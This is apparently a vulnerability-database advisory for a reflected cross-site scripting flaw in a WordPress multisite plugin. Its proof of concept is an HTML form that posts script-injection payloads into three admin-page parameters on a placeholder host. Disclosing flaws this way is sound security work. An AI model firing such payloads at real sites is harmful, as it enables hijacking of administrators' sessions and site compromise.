WordPress Plugin Vulnerabilities
Multisite Content Copier/Updater < 2.1.0 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the wmcc_content_type, wmcc_source_blog and wmcc_record_per_page parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
<html> <body> <form action="http://example.com/wp-admin/network/admin.php?page=wordpress-multisite-content-copier" method="POST"> <input type="hidden" name="wmcc_content_type" value='"><script>alert(/XSS-content_type/)</script>' /> <input type="hidden" name="wmcc_source_blog" value='1"><script>alert(/XSS-source/)</script>' /> <input type="hidden" name="wmcc_record_per_page" value='10"><script>alert(/XSS-record/)</script>' /> <input type="hidden" name="submit" value="Filter" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Asif Nawaz Minhas
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2023-04-12 (about 1 years ago)